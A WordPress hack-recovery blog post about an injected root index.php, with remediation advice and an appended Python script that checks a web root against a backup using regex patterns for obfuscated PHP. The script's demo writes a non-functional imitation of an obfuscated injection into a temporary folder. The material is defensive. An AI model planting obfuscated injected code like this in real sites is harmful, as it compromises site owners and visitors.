WordPress Hack Recovery - Fixing a Malicious Index.php

by 디런치 2021. 7. 4.

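Today I want to talk about an attack on WordPress running on Apache. In my case, the WordPress installed in the root folder suddenly became inaccessible one day. Tracking down the cause is simple once you have done it a few times, but the first time it is easy to panic and not know where to start or what to do. I hope this post is of some help in that situation.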

 

 

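First, to track down the problem, I checked the Index.php file and the htaccess file to see whether anything was wrong with path access in the root folder (not the WordPress installation folder; on hosting this is usually the www folder). That is exactly where I found the problem.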

 

When I compared it with the Index.php file I had kept as a backup, it contained different commands. The commands it contained were as follows.


 

 

 

As those familiar with it will know, the Index.php in the root folder does not normally contain commands like the above; it is usually as simple as the following.

 

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );?>

 

 

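Googling turned up no solution or post about commands like the above. So I had to work it out on my own, and the phpMyAdmin installed in the root folder gave me one clue. After the above had been added, accessing phpMyAdmin showed the following message.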

 

"There is mismatch between HTTPS indicated on the server and client. This can lead to non working phpMyAdmin or a security risk. Please fix your server configuration to indicate HTTPS properly."

 

 

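Put simply, it says "php - the HTTPS indicated on the server and the client does not match". It seems some message was output because the index.php that should route requests to WordPress contained other commands. Conversely, if phpMyAdmin shows a message like the one above, a problem with index.php is worth suspecting.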

 

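In any case, the fix is simple: delete the commands at the top of index.php. However, if malicious files are still present the code may reappear, so, as I noted in a previous post, you should 1. check whether any folders you have not seen before have been created, 2. tighten the permission settings on the WordPress folders and files, and 3. always keep a backup for situations like this. See here for details.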
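The checks described in this post (compare index.php and .htaccess with a backup, look for unfamiliar folders, review permissions) can be scripted. The following is an added example, not code from the original post; the marker patterns are modelled on the injected file, and the directory names, the `expected_dirs` set and the sample files are assumptions constructed for the demonstration.

```python
import hashlib
import re
import stat
import tempfile
from pathlib import Path

# Obfuscation markers modelled on the injected index.php from this incident.
MARKERS = {
    # ${"G\x4cO\x42\x41\x4cS"}[...]: superglobal name hidden behind hex escapes
    "hex_escaped_superglobal": re.compile(
        r'\$\{"[A-Za-z_]*(?:\\x[0-9a-fA-F]{2}[A-Za-z_]*)+"\}'),
    # $s{2}.$s{22}.$s{16}...: names assembled one character at a time
    "string_offset_chain": re.compile(r'(?:\$\w+\{\d+\}\s*\.\s*){4,}'),
    # "\x46\x49\x4c...": long runs of hex-escaped bytes
    "hex_escape_run": re.compile(r'(?:\\x[0-9a-fA-F]{2}){8,}'),
}

# Constructed sample content (not taken from a real site).
CLEAN_INDEX = (
    "<?php\n"
    "define('WP_USE_THEMES', true);\n"
    "require( dirname( __FILE__ ) . '/wp-blog-header.php' );\n"
)
# Constructed, non-functional fragment that only imitates the three markers.
INJECTED_PREFIX = (
    '<?php $k="abcdefgh";$f=$k{2}.$k{0}.$k{1}.$k{3}.$k{4};'
    '${"G\\x4cO\\x42\\x41\\x4cS"}["\\x46\\x49\\x4c\\x38\\x38\\x49\\x38\\x4c"](0);?>\n'
)


def sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def find_markers(path):
    """Return the names of the obfuscation markers present in one PHP file."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    return sorted(name for name, rx in MARKERS.items() if rx.search(text))


def check_webroot(root, backup, expected_dirs):
    """Compare a live web root with a known-good backup copy."""
    root, backup = Path(root), Path(backup)
    report = {"changed": [], "markers": {}, "unknown_dirs": [], "loose_perms": []}
    # Entry points that were checked first in the incident described here.
    for name in ("index.php", ".htaccess"):
        live, good = root / name, backup / name
        if live.is_file() and (not good.is_file() or sha256(live) != sha256(good)):
            report["changed"].append(name)
    for php in sorted(root.rglob("*.php")):
        hits = find_markers(php)
        if hits:
            report["markers"][str(php.relative_to(root))] = hits
    # Step 1 of the post: folders that were not there before.
    for entry in sorted(root.iterdir()):
        if entry.is_dir() and entry.name not in expected_dirs:
            report["unknown_dirs"].append(entry.name)
    # Step 2 of the post: group- or world-writable files and folders.
    for path in sorted(root.rglob("*")):
        if path.is_symlink():
            continue
        if path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            report["loose_perms"].append(str(path.relative_to(root)))
    return report


def build_demo(tmp):
    """Create a constructed backup tree and a tampered live tree under tmp."""
    tmp = Path(tmp)
    backup, root = tmp / "backup", tmp / "www"
    for base in (backup, root):
        (base / "wp-admin").mkdir(parents=True)
        (base / "index.php").write_text(CLEAN_INDEX)
        (base / ".htaccess").write_text("# BEGIN WordPress\n# END WordPress\n")
    (root / "index.php").write_text(INJECTED_PREFIX + CLEAN_INDEX)
    (root / "temp").mkdir()                 # folder that is not in the backup
    for path in list(root.rglob("*")):
        path.chmod(0o755 if path.is_dir() else 0o644)
    (root / ".htaccess").chmod(0o666)       # deliberately too permissive
    return root, backup


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        live, good = build_demo(tmp)
        for key, value in check_webroot(live, good, {"wp-admin"}).items():
            print(f"{key}: {value}")
```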

 
